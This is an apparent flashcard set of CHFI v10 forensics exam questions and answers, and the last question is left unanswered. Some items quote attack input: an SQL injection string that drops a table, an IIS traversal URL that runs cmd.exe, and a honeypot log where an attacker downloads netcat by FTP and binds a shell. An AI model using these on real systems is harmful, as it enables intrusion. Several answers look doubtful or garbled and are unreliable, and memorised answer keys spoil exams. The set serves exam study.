CHFI V10

¡Supera tus tareas y exámenes ahora con Quizwiz!

During an investigation, an employee found to have deleted harassing emails that were sent to someone else. The company was using Microsoft Exchange and had message tracking enabled. Where could the investigator search to find the message tracking log file on the Exchange server?

C:\Program Files\Exchsrvr\servername.log

What type of flash memory card comes in either Type I or Type II and consumes only five percent of the power required by small hard drives?

CF memory

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not?

CVE

In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?

Chain of custody

Your company's network just finished going through SAS 70 audit. This audit reports that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommends turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP to your network?

Change the default community string names

Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought in to assess the network security. Although they found very few issues, they were able to enumerate the model, OS version, and capabilities of all your Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this information on your Cisco routers?

Cisco Discovery protocol

In Microsoft file structures, sectors are grouped together and they form:

Clusters

In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data

Computer Forensics

_____________ is simply the application of Computer investigation and analysis techniques in the interests of determining potential legal evidence.

Computer Forensics

Which response organization tracks hoaxes as well as viruses?

Computer Incident Advisory Capability (CIAC)

How often must a company keep log files for them to be admissible in a court of law?

Continuously

If a suspect computer is located in an area that might have toxic chemicals, you must do which of the following?

Coordinate with the HAZMAT team

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data. What method would be most efficient for you to acquire digital evidence from this network?

Create a sparse data copy of a folder or file

John is working on his company policies and guidelines. The section hie is currently working on covers company documents, how they should be handled, stored and eventually destroyed. John is concerned about the process where by outdated document are destroyed. What type of shredder should john writ in the guidelines to be used when destroying documents?

Cross-cut shredder

What techniques is used by JPEGs for compression?

DCT

You are assisting in the investigation of a possible Web Server hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a pornographic website. The company checked the webserver and nothing appears wrong. When you type the IP address of the website in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution server resulting in those servers directing users to the wrong website?

DNS poisoning

What type of file is represented by a colon (:) with a name folloiwng it in the Master File Table (MFT) of an NTFS disk?

Data Stream File

Software firewalls work at which layer of the OSI model?

Data link

What will the following command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email= '[email protected]'; DROP TABLE members; --'

Deletes the entire members table

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

Denial of service

What will the following URL produce in an unpatched IIS web server? http://www.thetargetsite.com/scrips/..%co%af../windows/system32/cmd.exe?/c+dir+c:\

Directory listing of C: drive on the web server

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks. What countermeasures could he take to prevent DDoS attacks?

Disable direct broadcasts

The efforts to obtain information before a trial by demanding documents, depositions, question and answers written under oath, written requests for admissions of fact, and examination of the scene is a description of what legal term?

Discovery

What feature of Decryption Collection allows an investigator to crack a password as quickly as possible?

Distribute processing over 16 or fewer computers

Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and zombies?What type of Penetration Testing is Larry planning to carry out?

DoS penetration testing

What information do you need to recover when searching a victim computer from crime committed with specific e-mail messages?

E-mail header

You have been asked to investigate after a user which reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?

E-mail header

Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops?

EFS Encryption

Printing under a Windows Computer normally requires which one of the following files types to be created?

EMF (Enhanced MetaFile)

You are a computer forensic investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printed out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _____ in order to track the emails back to the suspect.

Email header

Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected?

End-to-end

Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable? A. Enticement B. Entrapment C. Intruding into a honeypot is not illegal D. Intruding into a DMZ is not illegal

Entrapment

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?

Enumerate domain user accounts and built-in groups

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owner by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?

Ettercap

What technique used by Encase makes it virtually impossible to tamper with evidence once it has been acquired?

Every byte of the file(s) is verified using 32-bit CRC

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

Evidence in a criminal case must be secured more tightly than in a civil case

What file structure database would you expect to find on floppy disks?

FAT 12

When using an IPod and the host computer is not running Windows, what file system will be used?

FAT32

When searching through file headers for pictures file formats, what should be searched to find a JPEG file in the hexadecimal format?

FF D8 FF E0 00 10

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test. The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?

False negatives

This is the original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.

File allocation Table (FAT)

Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would be the following command accomplished? dcfidd if=/dev/zero of=/devhda bs=4096 conv=noerror, sync

Fill the disk with zeros

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?

Firewalk sets all packets with the TTL of one

What type of attack sends spooked UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network?

Fraggle

What operating system would repond to the following command? C:/> nmap -sW 10.10.145.65

FreeBSD

A packet is sent to a router that does not have the packet destination address in its route table.How will the packet get to its proper destination?

Gateway of last resort

The objective of this act was to protect consumers personal financial information held by financial institutions and their service providers.

Gramm-Leach-Bliley ACT (GBLA)

Heather, a computer forensics investigator, is assisting a group of investigators working on a large computer fraud case involving over 20 people. These 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather responsibility is to find out how the accused people communicated between each other. She has searched their email and their computers and has not found any useful evidence. Heather then finds some possibly useful evidence under the desk of one of the accused.In an envelope she finds a piece of plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic with holes at many of the other accused peoples desks. Heather believes that the 20 people involved in the case were using a cipher to send secret messages in between each other. What type of cipher was used by the accused in this case?

Grill cipher

Which of the following filesystem is used by MAC OS X?

HFS+

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks.

HIDS & Anomaly detection

You are a security analyst performing a penetration test for a company int he Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type the following URL that includes the IP address of one of the routers: HTTP://172.168.3.131/level/99/exec/show/config after typing the URL, you are presented with the entire configuration file for that router. What have you discovered?

HTTP Configuration Arbitrary Administrative Access Vulnerability

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

HTTP protocol does not maintain session

John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web café reportedly used as a botnet server. John thoroughly scans the computer and finds nothing that could lead him to think the computer was a botnet server. John decides to scan the virtual memory of the computer to possibly find something he had missed. What information will the virtual memory scan produce?

Hidden running processes

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this?

Hillary network username and password hash

What header field in the TCP/IP protocol stack involves the hacker exploits known as the ping of death?

ICMP header field

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

ICMP ping sweep

When is it appropriate to use computer forensics?

If copyright and intellectual property theft/misuse has occurred

A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Choose the most feasible option.

Image the disk and try to recover deleted files

Julie is a college student majoring in Information Systems and Computer Science. She is currently writing an essay for her computer crimes class. Julie paper focuses on white-collar crimes in America and how forensics investigators investigate the cases. Julie would like to focus the subject. Julie would like to focus the subject of the essay on the most common type of crime found in corporate America. What crime should Julie focus on?

Industrial espionage

You are working as a computer forensics investigator and are called by the owner of an account firm to investigate possible computer abuse by one of the firm's employee. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will. What do you do?

Inform the owner that conducting an investigation without a policy is a violation of the employees expectation of privacy.

You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position: 7+ years experience in Windows Server environments, 5+ years experience in Exchange 2000/2003 environment, experience with Cisco Pix firewall, Linksys 1376 router, oracle 11i and MYOB v3.4 account software are required MCSA desired MCSE, CEH preferred, No Unix/Linux experience needed. What is this information on the job website considered?

Information vulnerability

What advantage does the tool Evidor have over the built-in Windows search?

It can search slack space

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?

It doesn't matter as all replies are faked

If a PDA is seized in an investigation while the device is turned on, What would be the proper procedure?

Keep the device powered on

You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember you ECSA class. He asks about the methodology you will be using to test the company's network. How would you answers?

LPT Methodology

What file is processed at the end of a Windows XP boot to initialize the logon dialog box?

LSASS.EXE

You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing?

List weak points on their network

Jason in the security administrator of ACMA metal corporation. One day notices the company's Oracle database server has been compromised and the customer information along with financial data has bee stolen. The financial loss will be in million of dollars if the database gets into the hands of the competition. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the U.S. ?

Local or national office of the U.S. secret service

What does the superblock in Linux define?

Location of the first inode

If you are concerned about a high level of compression but not concerned about any possible data loss, what type of compression would you use?

Lossy Compression

When operating systems mark a cluster as used but not allocated, the cluster is considered as _____

Lost

When investigating a wireless attack, what information can be obtained from the DHCP logs?

MAC address of the attacker if any computers on the network are running in promiscuous mode

What does Encase search to recover NTFS files and folders?

MFT

What binary coding is used most often for e-mail purposes?

MIME

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however, your boss is still concerned that the defense attorney might question whether the evidence has been changed while a the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?

Make MD5 hashes of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab.

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case. you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?

Make an MD5 hash of the evidence and compare it with the original hash that was taken when the evidence first entered the lab

To preserve digital evidence, an investigator should ____________________.

Make two copies of each evidence item using different imaging tools

You are working as a computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows that subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact local law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject computer. You inform the officer that you will not be able to comply with that request because doing so would:

Make you an agent of law enforcement

What is a good security method to prevent unauthorized users from "tailgating"?

Man trap

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully block some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and has signatures changed from child to child. but the functionality stays the same. What type of virus is this that you are testing?

Metamorphic

When investigating a computer forensics case where Microsoft exchange and Blackberry Enterprise servers are used, where would investigators need to search to find email sent from a blackberry device?

Microsoft Exchange server

After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, stateful firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?

NAT does not work with IPSEC

Which program is the OOT loader when Windows XP starts up?

NTLDR

When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. what is the name of the service used to synchronize time amounts multiple computers?

NTP Network time protocol

Where is the startup configuration located on a router?

NVRAM

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software ?

National Institute of Standards and Technology (NIST)

This organization maintains a database of hash signatures for known software

National Software Reference Library (a NIST project)

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation?

Nessus is too loud

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network so you plan to perform a passive footprinting against their Web servers. What tool should you use?

Netcraft

Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use?

Netspionage

You have been called in to help with an investigation of an alleged network intrusion. After questioning the members of the company IT department, you search through the server log files to find any trace of the intrusion. After that you decided to work telnet into one of the company routers to see if there is any evidence to be found. While connected to the router, you see some unusual activity and believe that the attackers are currently connected to the router. You start up an ethereal session to being capturing the traffic on the router that could be used in the investigation. At what layer of the OSI model are you monitoring while watching traffic to and from the router?

Network

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

Network Administrator

A computer forensics investigator is inspecting a firewall logs for a large financial institution that has employees working 24/7. What can the investigator infer from the screen shot?

Network intrusion has occurred

While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a Lay witness, what field would she be considered an expert in?

No particular field

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

Nothing in particular as these can be operational files

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?

OSPF

How many times can data be written on a DVD+R disk?

Once

Steven has been given the task of designing a computer forensics lab for the company he works for. He has found documentation on all aspect of how to design a lab except the number of exits needed. How many exits should Steven include in his design for the computer forensics lab?

One

In a forensics examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

One who has lots of allocation units per block or cluster

An on-site incident response team is called to investigate an alleged case of computer tampering within their company. Before proceeding with the investigation, the CEO informs them that the incident will be classified as low level. How long will the team have to respond to the incident?

One working day

After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts responds to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?

Only Unix and Unix-like systems will reply to this scan

It takes ____ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?

Only one

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

Only the reference to the file is removed from the FAT and can be recovered.

Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scans and most of the ports scanned do not give a response. In what state are these ports?

Open

An employee is attempting to wipe out data stored on a couple of compact disks (CDs) and digital video disks (DVDs) by using a large magnet. You inform him that his method will not be effective in wiping out the data because CD's and DVD's are _________ media used to store large amounts of data and are not affected by the magnet.

Optical

Which files should be used to restore archived email messages from someone using Microsoft Outlook?

Outlook.pst

Travis, a computer forensics investigator, is finishing up a case he has been working on for over a month involving copyright infringement and embezzlement. His last task is to prepare an investigative report for the president of the company he has been working for. Travis must submit a hard copy and an electronic copy to this president. In what electronic format should Travis send this report?

PDF

Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis. he needs to send PDF documents with a password and sends them to their intended recipients. Why PDF passwords do not offer the maximum protection?

PDF passwords can easily be cracked by software brute force tools

When obtaining a warrant it is important to?

Particularly describe the place to be searched and particularly describe the items to be seized.

What will the following command accomplish in Linux? Fdisk /dev/hda

Partition a hard drive

You are the network administrator for a small bank in Dallas, Texas. To ensure network security, you enact a security policy that requires all users to have 14 character passwords. A week later you dump the SAM database from the standalone server and run a password-crack tool against it. Over 99% of the passwords are broken within an hour. Why were these passwords cracked so quickly?

Passwords of 14 characters or less are broken up into two 7-character hashes

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?

Perform a zone transfer

Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul has been called upon to help investigate a computer hacking ring broken up by the local police. Paul begins to inventory the PCs found in the hackers hideout. Paul then comes across a PDA left by them that is attached to a number of different peripheral devices. What is the first step that Paul must take with the PDA to ensure the integrity of the investigation?

Photograph and document the peripheral devices

Cylie is investigating a network breach at a state organization in Florida. She discovers that the intruders were able to gain access into the company firewalls by overloading them with IP packets. Cylie then discovers through her investigation that the intruders hacked into the company phone system and used the hard drives on their PBX system to store shared music files. What would this attack on the company PBX system be called?

Phreaking

Sniffers that place NICs in promiscuous mode work at what layer of the OSI model?

Physical

Which of the following is not a graphics file?

Picture3.nfo

An investigator is searching through the firewall logs of a company and notices ICMP packets that are larger than 65,538bytes. What type of activity is the investigator seeing?

Ping of death

Law enforcement officers are conducting a legal search for which a valid warrant was obtained. While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how the this evidence is admissible?

Plain view doctrine

What TCP/UDP port does the toolkit program netstat use?

Port 15

You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls? (Choose two.)

Port 161 & 162

What does the acronym POST mean as it relates to a PC?

Power on self test

Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the power plug so that he does not disturbs the system in anyway. He labels all cables and connectors prior to disconnecting any. What do you think would be the sext sequence of events?

Prepare the system for acquisition; connect the target media; Copy the media, Secure the evidence

When cataloging digital evidence, the primary goal is to do what?

Preserve evidence integrity

What are the security risks of running a "repair" installing of Windows XP?

Pressing Shift+F10 give the user administrative rights

When using Windows acquisitions tool to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to ___.

Prevent contamination to the evidence drive

A law enforcement officer may only search for an seize criminal evidence with ____, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, evidence of the specific crime exists and the evidence of the specific crime exist at the place to be searched

Probably cause

George is a senior security analyst working for a state agency in Florid a. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time-based induction machine" be used.What IDS feature must George implement to meet this requirement?

Real-time anomaly detection

Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florid a. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, requested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use?

Reciprocation

When you carve an image, recovering the image depends on which of the following skills?

Recognizing the pattern of the header content

When examining a hard disk without a write-blocker, you should not start Windows because windows will write data to the?

Recycle Bin

Click on the exhibit button Paulette works for an IT security consulting company that is currently performing an audit for the firm ACE unlimited. Paulette's duties include logging on to all the company's network equipment to ensure IOS versions are up-to-date and all the other security setting are as stringent as possible. Paulette present the following screenshot to her boss so he can inform the client about necessary changes needed to be made. From the the screen shot, what changes should the client company make?

Remove any identifying numbers, name or version information

What is one method of bypassing a system BIOS password?

Remove the CMOS battery

Using Linux to carry out a forensics investigation, what would the following command accomplish? dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

Restore a disk from an image file

After attending CEH security seminar, you make a list of changes you would like to perform on your network to increase its security. One of the first things you change is to switch the Restrict Anonymous setting from 0 to 1 on your servers. This as you were told, would prevent anonymous users from establishing a null session on the server. Using Userinfo tool mentioned at the seminar, you succeed in establishing a null session which one of the servers. Why is that?

RestrictAnonymous must be set to 2 for complete security.

What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server the course of its lifetime?

Review SIDs in the Registry

The use of warning banners helps a company avoid litigation by overcoming an employee assumed__________________________. When connecting to the company's intranet, network or Virtual Private Network(VPN) and will allow the company's investigators to monitor, search and retrieve information stored within the network.

Right of privacy

George was recently fired from his job as an IT analyst at Pitts and Company in Dallas Texas. His main duties as an analyst were to support the company Active Directory structure and to create network policies. George now wants to break into the company network by cracking some of company Active directory structure and to create network policies. George now wants to break into the company network by cracking some of the service accounts he knows about. Which password cracking technique should George use in this situation?

Rule-based attack

On an active directory network using NTLM authentication, where on the domain controllers are the passwords stored?

SAM

What hashing method is used to password protect Blackberry devices?

SHA-1

Click on the exhibit button To test you website for vulnerabilities, you type in a Quotation mark for the username field. After you click OK, you receive the following error message window. What can you infer from the error window?

SQL injection is possible

While looking through the IIS log file of a web server, you find the following entries:

SQL injection is possible

George if the network administrator of a large internet company on the west coast. Per corporate policy, none of the employees in the compnay are allowed to use FTP of SFTP programs without obtaining approbal from the IT department. Few mangers are using SFTP program on their commputer. Before talking ot his boos, George want to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network. What filter should George use in Ethereal?

SRC port 22 and DST port 22

What type of attack sends SYN requests to a target system with spoofed IP addresses?

SYN Flood

What should you do when approached by a reported about a case that you are working on or have worked on?

Say, No comment

With regard to using an antivirus scanner during a computer forensics investigation, you should

Scan your forensics workstation before beginning an investigation

When conducting computer forensic analysis, you must guard against _____ so that you remain focused on the primary job and insure that the level of work does not increase beyond what you originally expected.

Scope Creep

What must be obtained before an investigation is carried out at a location?

Search warrant

Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?

Search warrant

A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. why would this not be recommended?

Searching can change date/time stamps

What is the smallest physical storage unit on a hard drive?

Sector

The______ refers to handing over the results of private investigations to the authorities because of indications of criminal activity

Silver-Platter Doctrine

Which of the following refers to the date that might still exist in a cluster though the original file has been overwritten by another file?

Slack Space

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

Smurf

On Linux/Unix based Web servers, what privileges should the daemon service be run under?

Something other than root

Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?

Steganography

What term is used to describe a cryptographic techniques for embedding information into something else for the sole purpose of hiding information from the casual observer?

Steganography

Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?

Supervisors

What type of analysis helps to identify the time and sequences of events in an investigation?

Temporal

what will the following command accomplish? C:\> nmap -v -SS -Po 172.16.28.251 -data_length 66000 -packet_trace

Test the ability of a router to handle over-sized packets

The police believe that Mevin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, internet service providers, and educational institutions. They also suspect that he has been stealing, copying, and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspects door and searching his home and seizing all of his computer equipment if they have no yet obtained a warrant?

The 4th amendment

Windows identifies which application to open a file with by examining which of the following?

The File extension

In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact the ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?

The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant.

An Expert witness give an opinion if:

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

The offset in a hexadecimal code is:

The Ox at the beginning of the code

When carrying out a forensics investigation, why should you never delete a partition on a dynamic disk?

The action can corrupt the disk

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file permission Canonicalization vulnerability (Unicode attack) allows scripts to run in arbitratry folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing the RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construc SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker make a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.215.162>ftpcom" "cmd1.exe /c echo johna2k>>ftpcom" "cmd1.exe /c echo haxedj00>>ftpcom" "cmd1.exe /c echo get nc.exe>>ftpcom" "cmd1.exe /c echo get pdump.exe>>ftpcom" "cmd1.exe /c echo quit>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p6969 -e cmd1.exe" what can you infer?

The attack is a remote exploit and the hacker downloads three files

You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large pharmaceutical manufacturer. While at the corporate office of the company, the CEO demands to know the status of the investigation. What prevents you from discussing the case with the CEO?

The attorney-work-product rule

In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the internet. This project will help him write his doctoral thesis on "brining down the internet". Without sniffing the traffic between the routers, Michael sends millions of REST packets to the routers in an attempt to shut one of all the them down. After a few hours, one of the routers finally shuts down. What will the other routers communicate between themselves?

The change in routing fabric to bypass the affected router

As a CHFI professional, which of the following is the most important to your professional reputation?

The correct, successful management of each and every case

As a security analyst you setup a false survey website that will require users to create a username and strong password. You send the link to all the employees of the company. What information will you be able to gather?

The employees network usernames and passwords

One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator exam to verify that the file has the correct extension?

The file header The file header usually contains a "file signature", a unique sequence of characters that identify the true filetype.

A forensics investigator is searching the hard drive of a computer for the files that were recently moved t othe Recycle Bin. He searched for the file in the C:\Recycled using a command line tool but does not find anything. What is the reason for this?

The files are hidden and he must use switch to view them.

While searching through a computer under investigation, you discover numerous files that appear to have had the first letter of the file replaced by a hex code byte 5h. What does this indicated on the computed?

The files have been marked for deletion

You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connect is successful even though you have FTP blocked at the external firewall. What has happened?

The firewall failed-open

When examining a file with a Hex Editor, what space does the file header occupy?

The first several bytes of the file

Why would you need to find out the gateway of a device when investigating a wireless attack?

The gateway will be the IP used to mange the access point

Corporate investigations are typically easier than public investigations because:

The investigator does not have to get a warrant

You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?

The life of the author plus 70 years

Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?

The logic, formatting and elegance of the code used in the attack

When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts ______ in the first letter position of the filename in the FAT database.

The lowercase Greek letter Sigma (s)

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody form to properly document each piece of evidence as other members of you team collect it. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.

When marking evidence that has been collected with the aa/ddmmyy/nnnn/zz format, what does the nnnn denote?

The sequential number of the exhibit seized

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this care?

